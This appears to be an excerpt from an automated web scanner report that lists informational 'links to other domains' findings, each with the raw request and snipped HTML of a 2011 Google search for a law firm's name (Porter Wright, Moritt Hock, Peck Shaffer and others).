<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:uHladnwUgGUJ:www.wendel.com/index.cfm%3Ffuseaction%3Dcontactus.form+Wendel+Rosen&amp;cd=6&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:uHladnwUgGUJ:www.wendel.com/index.cfm%3Ffuseaction%3Dcontactus.form+Wendel+Rosen&cd=6&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','6','','0CE0QIDAF')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.wendel.com/index.cfm?fuseaction=content.contentDetail&amp;id=8825" class=l onmousedown="return clk(this.href,'','','','7','','0CE8QFjAG')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:sI1frR8fZ9oJ:www.wendel.com/index.cfm%3Ffuseaction%3Dcontent.contentDetail%26id%3D8825+Wendel+Rosen&amp;cd=7&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:sI1frR8fZ9oJ:www.wendel.com/index.cfm%3Ffuseaction%3Dcontent.contentDetail%26id%3D8825+Wendel+Rosen&cd=7&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','7','','0CFQQIDAG')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.bcorporation.net/wendelrosen" class=l onmousedown="return clk(this.href,'','','','8','','0CFcQFjAH')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:ISowbsZXKvgJ:www.bcorporation.net/wendelrosen+Wendel+Rosen&amp;cd=8&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','8','','0CFwQIDAH')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://twitter.com/WendelRosen" class=l onmousedown="return clk(this.href,'','','','9','','0CF0QFjAI')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:dtAmKG6DD9UJ:twitter.com/WendelRosen+Wendel+Rosen&amp;cd=9&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','9','','0CGIQIDAI')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.facebook.com/WendelRosen" class=l onmousedown="return clk(this.href,'','','','10','','0CGMQFjAJ')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:DgS9PfQ3KoYJ:www.facebook.com/WendelRosen+Wendel+Rosen&amp;cd=10&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','10','','0CGgQIDAJ')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.startingupgreen.com/index.php/expert-help/5-green-resources/57-green-law-firm" class=l onmousedown="return clk(this.href,'','','','11','','0CGkQFjAK')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:CA8KVzAVRocJ:www.startingupgreen.com/index.php/expert-help/5-green-resources/57-green-law-firm+Wendel+Rosen&amp;cd=11&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','11','','0CG4QIDAK')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.linkedin.com/company/wendel-rosen-black-&amp;-dean-llp" class=l onmousedown="return clk(this.href,'','','','12','','0CG8QFjAL')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:7lKYIllUl-UJ:www.linkedin.com/company/wendel-rosen-black-%26-dean-llp+Wendel+Rosen&amp;cd=12&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:7lKYIllUl-UJ:www.linkedin.com/company/wendel-rosen-black-%26-dean-llp+Wendel+Rosen&cd=12&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','12','','0CHQQIDAL')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.triplepundit.com/2010/11/interview-william-acevedo-of-wendel-rosen-black-dean-llp/" class=l onmousedown="return clk(this.href,'','','','13','','0CHUQFjAM')">Interview: William Acevedo of <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:_RgN3NCTnk0J:www.triplepundit.com/2010/11/interview-william-acevedo-of-wendel-rosen-black-dean-llp/+Wendel+Rosen&amp;cd=13&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','13','','0CHoQIDAM')">Cached</a>
...[SNIP]...
<div><a href="http://www.fablaw.com/" class=l onmousedown="return clk(this.href,'','','','14','','0CHwQoggwDQ')">Fitzgerald, Abbott & Beardsley LLP</a>
...[SNIP]...
<div><a href="http://www.donahue.com/" class=l onmousedown="return clk(this.href,'','','','15','','0CH4QoggwDg')">Donahue Gallagher Woods LLP</a>
...[SNIP]...
<div><a href="http://www.mofo.com/" class=l onmousedown="return clk(this.href,'','','','16','','0CIABEKIIMA8')">Morrison & Foerster</a>
...[SNIP]...
<div><a href="http://www.reedsmith.com/" class=l onmousedown="return clk(this.href,'','','','17','','0CIIBEKIIMBA')">Reed Smith</a>
...[SNIP]...
24.18. http://www.google.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /search?q=Porter+Wright+Morris+%26+Arthur&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a HTTP/1.1
Host: www.google.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: PREF=ID=a84248b084119e14:U=0e01645f8124d18b:FF=0:TM=1297097718:LM=1297260472:S=nEXcDanFJNlg7e6-; NID=46=MZ67J2sMk2-iutK_j-M5kw_OU3QwEqLvmD3FPQ_AsjnltT7UerAb1HjiSijLELzg8YEwu50i5Tjttnu8jq1EP7Tjw2-1bm8QN0ooAhBiMftqXzqms7RFfZAGQXTL5FgE

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:04:58 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 77820

<!doctype html> <head> <title>Porter Wright Morris &amp; Arthur - Google Search</title> <script>window.google={kEI:"KgXMTajdGsmJ0QHC3dn2Bg",kEXPI:"17259,23756,24692,24878,24879,27400,28164,2850
...[SNIP]...
</div><a id=gb_36 href="http://www.youtube.com/results?q=Porter+Wright+Morris+%26+Arthur&oe=utf-8&rls=org.mozilla:en-US:official&client=firefox-a&um=1&ie=UTF-8&sa=N&hl=en&tab=w1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<h3 class="r"><a href="http://www.porterwright.com/" class=l onmousedown="return clk(this.href,'','','','1','','0CBoQFjAA')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:O7uqHMn85WEJ:www.porterwright.com/+Porter+Wright+Morris+%26+Arthur&amp;cd=1&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:O7uqHMn85WEJ:www.porterwright.com/+Porter+Wright+Morris+%26+Arthur&cd=1&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','1','','0CB8QIDAA')">Cached</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.porterwright.com/people/" onmousedown="return clk(this.href,'','','','1','','0CCEQqwMoADAA')">People</a></div><div class=sld><a class=sla href="http://www.porterwright.com/contactus/" onmousedown="return clk(this.href,'','','','1','','0CCIQqwMoATAA')">Contact Us</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.porterwright.com/careers/" onmousedown="return clk(this.href,'','','','1','','0CCMQqwMoAjAA')">Careers</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.porterwright.com/firm/" onmousedown="return clk(this.href,'','','','1','','0CCQQqwMoAzAA')">Firm</a></div><div class=sld><a class=sla href="http://www.porterwright.com/resources/" onmousedown="return clk(this.href,'','','','1','','0CCUQqwMoBDAA')">Resources</a></div><div class=sld><a class=sla href="http://www.porterwright.com/client_login/" onmousedown="return clk(this.href,'','','','1','','0CCYQqwMoBTAA')">Client Login</a>
...[SNIP]...
<h3 class="r"><a href="http://www.porterwright.com/attorneys/" class=l onmousedown="return clk(this.href,'','','','3','','0CDEQFjAC')">Attorneys | Careers | <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:NPW95tOVoTgJ:www.porterwright.com/attorneys/+Porter+Wright+Morris+%26+Arthur&amp;cd=3&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:NPW95tOVoTgJ:www.porterwright.com/attorneys/+Porter+Wright+Morris+%26+Arthur&cd=3&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','3','','0CDYQIDAC')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.porterwright.com/firm/" class=l onmousedown="return clk(this.href,'','','','4','','0CDgQFjAD')">Overview | Firm | <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:OXHzbhblm7AJ:www.porterwright.com/firm/+Porter+Wright+Morris+%26+Arthur&amp;cd=4&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:OXHzbhblm7AJ:www.porterwright.com/firm/+Porter+Wright+Morris+%26+Arthur&cd=4&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','4','','0CD0QIDAD')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.porterwright.com/people/" class=l onmousedown="return clk(this.href,'','','','5','','0CD8QFjAE')">Search | People | <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:UDZGz-CIJ-YJ:www.porterwright.com/people/+Porter+Wright+Morris+%26+Arthur&amp;cd=5&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:UDZGz-CIJ-YJ:www.porterwright.com/people/+Porter+Wright+Morris+%26+Arthur&cd=5&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','5','','0CEQQIDAE')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.martindale.com/Porter-Wright-Morris-Arthur-LLP/1449367-law-firm-office.htm" class=l onmousedown="return clk(this.href,'','','','6','','0CEcQFjAF')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:E8yBb_JYd0IJ:www.martindale.com/Porter-Wright-Morris-Arthur-LLP/1449367-law-firm-office.htm+Porter+Wright+Morris+%26+Arthur&amp;cd=6&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:E8yBb_JYd0IJ:www.martindale.com/Porter-Wright-Morris-Arthur-LLP/1449367-law-firm-office.htm+Porter+Wright+Morris+%26+Arthur&cd=6&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','6','','0CEwQIDAF')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.superlawyers.com/ohio/lawfirm/Porter-Wright-Morris-and-Arthur-LLP/02f0588e-0308-4b59-9d7d-ba680399c24a.html" class=l onmousedown="return clk(this.href,'','','','7','','0CE8QFjAG')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:HcxPM-nC9vwJ:www.superlawyers.com/ohio/lawfirm/Porter-Wright-Morris-and-Arthur-LLP/02f0588e-0308-4b59-9d7d-ba680399c24a.html+Porter+Wright+Morris+%26+Arthur&amp;cd=7&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:HcxPM-nC9vwJ:www.superlawyers.com/ohio/lawfirm/Porter-Wright-Morris-and-Arthur-LLP/02f0588e-0308-4b59-9d7d-ba680399c24a.html+Porter+Wright+Morris+%26+Arthur&cd=7&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','7','','0CFQQIDAG')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.secactions.com/pdf/Gorman.pdf" class=l onmousedown="return clk(this.href,'','','','8','','0CFYQFjAH')">Thomas O. Gorman <em>
...[SNIP]...
<h3 class="r"><a href="http://www.bankingandfinancelawreport.com/promo/about/" class=l onmousedown="return clk(this.href,'','','','9','','0CF0QFjAI')">About <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:hbsgofw8S-oJ:www.bankingandfinancelawreport.com/promo/about/+Porter+Wright+Morris+%26+Arthur&amp;cd=9&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:hbsgofw8S-oJ:www.bankingandfinancelawreport.com/promo/about/+Porter+Wright+Morris+%26+Arthur&cd=9&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','9','','0CGIQIDAI')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.nanolawreport.com/" class=l onmousedown="return clk(this.href,'','','','10','','0CGMQFjAJ')">Nanotechnology Lawyer &amp; Attorney : <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:sk5WCgVEDQQJ:www.nanolawreport.com/+Porter+Wright+Morris+%26+Arthur&amp;cd=10&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:sk5WCgVEDQQJ:www.nanolawreport.com/+Porter+Wright+Morris+%26+Arthur&cd=10&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','10','','0CGgQIDAJ')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.technologylawsource.com/promo/about/" class=l onmousedown="return clk(this.href,'','','','11','','0CGoQFjAK')">About <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:SBSiRRhIj54J:www.technologylawsource.com/promo/about/+Porter+Wright+Morris+%26+Arthur&amp;cd=11&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:SBSiRRhIj54J:www.technologylawsource.com/promo/about/+Porter+Wright+Morris+%26+Arthur&cd=11&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','11','','0CG8QIDAK')">Cached</a>
...[SNIP]...
<div><a href="http://www.vorys.com/" class=l onmousedown="return clk(this.href,'','','','12','','0CHEQoggwCw')">Vorys, Sater, Seymour and Pease LLP</a>
...[SNIP]...
<div><a href="http://www.szd.com/" class=l onmousedown="return clk(this.href,'','','','13','','0CHMQoggwDA')">Schottenstein Zox & Dunn</a>
...[SNIP]...
<div><a href="http://www.bricker.com/" class=l onmousedown="return clk(this.href,'','','','14','','0CHUQoggwDQ')">of the Bricker</a>
...[SNIP]...
<div><a href="http://www.bakerlaw.com/" class=l onmousedown="return clk(this.href,'','','','15','','0CHcQoggwDg')">Baker Hostetler</a>
...[SNIP]...
24.19. http://www.google.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /search?q=Moritt+Hock+Hamroff+%26+Horowitz&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a HTTP/1.1
Host: www.google.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: PREF=ID=a84248b084119e14:U=0e01645f8124d18b:FF=0:TM=1297097718:LM=1297260472:S=nEXcDanFJNlg7e6-; NID=46=MZ67J2sMk2-iutK_j-M5kw_OU3QwEqLvmD3FPQ_AsjnltT7UerAb1HjiSijLELzg8YEwu50i5Tjttnu8jq1EP7Tjw2-1bm8QN0ooAhBiMftqXzqms7RFfZAGQXTL5FgE

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:08:18 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 69998

<!doctype html> <head> <title>Moritt Hock Hamroff &amp; Horowitz - Google Search</title> <script>window.google={kEI:"8gXMTZfUI4TL0AGhwZHUBg",kEXPI:"17259,23756,24692,24878,24879,27400,28164,285
...[SNIP]...
</div><a id=gb_36 href="http://www.youtube.com/results?q=Moritt+Hock+Hamroff+%26+Horowitz&oe=utf-8&rls=org.mozilla:en-US:official&client=firefox-a&um=1&ie=UTF-8&sa=N&hl=en&tab=w1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<h3 class="r"><a href="http://www.moritthock.com/" class=l onmousedown="return clk(this.href,'','','','1','','0CBYQFjAA')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:uHOA1UiydKsJ:www.moritthock.com/+Moritt+Hock+Hamroff+%26+Horowitz&amp;cd=1&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:uHOA1UiydKsJ:www.moritthock.com/+Moritt+Hock+Hamroff+%26+Horowitz&cd=1&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','1','','0CBsQIDAA')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.moritthock.com/index.php/attorneys/attorney/lee_j._mendelson" class=l onmousedown="return clk(this.href,'','','','2','','0CB0QFjAB')">Lee J. Mendelson | <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:9QN2DVZT1usJ:www.moritthock.com/index.php/attorneys/attorney/lee_j._mendelson+Moritt+Hock+Hamroff+%26+Horowitz&amp;cd=2&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:9QN2DVZT1usJ:www.moritthock.com/index.php/attorneys/attorney/lee_j._mendelson+Moritt+Hock+Hamroff+%26+Horowitz&cd=2&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','2','','0CCIQIDAB')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.moritthock.com/index.php/attorneys/attorney/henry_e._klosowski" class=l onmousedown="return clk(this.href,'','','','3','','0CCMQFjAC')">Henry E. Klosowski | <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:s2GPkndCJ-kJ:www.moritthock.com/index.php/attorneys/attorney/henry_e._klosowski+Moritt+Hock+Hamroff+%26+Horowitz&amp;cd=3&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:s2GPkndCJ-kJ:www.moritthock.com/index.php/attorneys/attorney/henry_e._klosowski+Moritt+Hock+Hamroff+%26+Horowitz&cd=3&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','3','','0CCgQIDAC')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.lawyers.com/New-York/Garden-City/Moritt-Hock-Hamroff-and-Horowitz-LLP-417972-f.html" class=l onmousedown="return clk(this.href,'','','','4','','0CCoQFjAD')"><em>
...[SNIP]...
<h3 class="r"><a href="http://www.elfaonline.org/pub/news/indnews/news_report.cfm?id=13246" class=l onmousedown="return clk(this.href,'','','','5','','0CDIQFjAE')">ELFA | <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:M6MmErtfvKUJ:www.elfaonline.org/pub/news/indnews/news_report.cfm%3Fid%3D13246+Moritt+Hock+Hamroff+%26+Horowitz&amp;cd=5&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:M6MmErtfvKUJ:www.elfaonline.org/pub/news/indnews/news_report.cfm%3Fid%3D13246+Moritt+Hock+Hamroff+%26+Horowitz&cd=5&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','5','','0CDcQIDAE')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://amlawdaily.typepad.com/files/dial-a-mattress-creditors-list.pdf" class=l onmousedown="return clk(this.href,'','','','6','','0CDgQFjAF')"><em>
...[SNIP]...
<h3 class="r"><a href="http://www.manta.com/c/mms87sh/moritt-hock-hamroff-horowitz" class=l onmousedown="return clk(this.href,'','','','7','','0CD4QFjAG')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:Ntr2QOukmNQJ:www.manta.com/c/mms87sh/moritt-hock-hamroff-horowitz+Moritt+Hock+Hamroff+%26+Horowitz&amp;cd=7&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:Ntr2QOukmNQJ:www.manta.com/c/mms87sh/moritt-hock-hamroff-horowitz+Moritt+Hock+Hamroff+%26+Horowitz&cd=7&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','7','','0CEMQIDAG')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.superpages.com/bp/Garden-City-NY/Moritt-Hock-Hamroff-Horowitz-L2063224208.htm" class=l onmousedown="return clk(this.href,'','','','8','','0CEUQFjAH')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:Gy_RLzwBAbUJ:www.superpages.com/bp/Garden-City-NY/Moritt-Hock-Hamroff-Horowitz-L2063224208.htm+Moritt+Hock+Hamroff+%26+Horowitz&amp;cd=8&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:Gy_RLzwBAbUJ:www.superpages.com/bp/Garden-City-NY/Moritt-Hock-Hamroff-Horowitz-L2063224208.htm+Moritt+Hock+Hamroff+%26+Horowitz&cd=8&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','8','','0CEoQIDAH')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://longisland.citysearch.com/profile/7450958/garden_city_ny/moritt_hock_hamroff_horowitz.html" class=l onmousedown="return clk(this.href,'','','','9','','0CEsQFjAI')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:jmw5bn-l7JoJ:longisland.citysearch.com/profile/7450958/garden_city_ny/moritt_hock_hamroff_horowitz.html+Moritt+Hock+Hamroff+%26+Horowitz&amp;cd=9&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:jmw5bn-l7JoJ:longisland.citysearch.com/profile/7450958/garden_city_ny/moritt_hock_hamroff_horowitz.html+Moritt+Hock+Hamroff+%26+Horowitz&cd=9&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','9','','0CFAQIDAI')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.letipli.com/member_details.asp?member_id=405" class=l onmousedown="return clk(this.href,'','','','10','','0CFEQFjAJ')">Attorney Estate Planning - Henry Klosowski - <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:zsvVWB0WlWwJ:www.letipli.com/member_details.asp%3Fmember_id%3D405+Moritt+Hock+Hamroff+%26+Horowitz&amp;cd=10&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:zsvVWB0WlWwJ:www.letipli.com/member_details.asp%3Fmember_id%3D405+Moritt+Hock+Hamroff+%26+Horowitz&cd=10&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','10','','0CFYQIDAJ')">Cached</a>
...[SNIP]...
24.20. http://www.google.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /search?q=Peck+Shaffer&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a HTTP/1.1
Host: www.google.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: PREF=ID=a84248b084119e14:U=0e01645f8124d18b:FF=0:TM=1297097718:LM=1297260472:S=nEXcDanFJNlg7e6-; NID=46=MZ67J2sMk2-iutK_j-M5kw_OU3QwEqLvmD3FPQ_AsjnltT7UerAb1HjiSijLELzg8YEwu50i5Tjttnu8jq1EP7Tjw2-1bm8QN0ooAhBiMftqXzqms7RFfZAGQXTL5FgE

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:07:58 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 66887

<!doctype html> <head> <title>Peck Shaffer - Google Search</title> <script>window.google={kEI:"3gXMTbvwIKXX0QGah_nuBg",kEXPI:"17259,23756,24692,24878,24879,27400,28164,28505,29229,29685,29795,2
...[SNIP]...
</div><a id=gb_36 href="http://www.youtube.com/results?q=Peck+Shaffer&oe=utf-8&rls=org.mozilla:en-US:official&client=firefox-a&um=1&ie=UTF-8&sa=N&hl=en&tab=w1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<h3 class="r"><a href="http://www.peckshaffer.com/" class=l onmousedown="return clk(this.href,'','','','1','','0CBkQFjAA')">Home : <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:Vl4BEsYLz-wJ:www.peckshaffer.com/+Peck+Shaffer&amp;cd=1&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','1','','0CB4QIDAA')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.peckshaffer.com/offices.php?OfficeID=1" class=l onmousedown="return clk(this.href,'','','','2','','0CCAQFjAB')">Cincinnati : Offices : <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:U83dunODV4EJ:www.peckshaffer.com/offices.php%3FOfficeID%3D1+Peck+Shaffer&amp;cd=2&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:U83dunODV4EJ:www.peckshaffer.com/offices.php%3FOfficeID%3D1+Peck+Shaffer&cd=2&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','2','','0CCUQIDAB')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.peckshaffer.com/news.php" class=l onmousedown="return clk(this.href,'','','','3','','0CCcQFjAC')">news : <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:btzoOkmuOU0J:www.peckshaffer.com/news.php+Peck+Shaffer&amp;cd=3&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','3','','0CCwQIDAC')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.peckshaffer.com/disclaimer.php" class=l onmousedown="return clk(this.href,'','','','4','','0CC4QFjAD')">disclaimer : <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:iRg6AN9i68IJ:www.peckshaffer.com/disclaimer.php+Peck+Shaffer&amp;cd=4&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','4','','0CDMQIDAD')">Cached</a>
...[SNIP]...
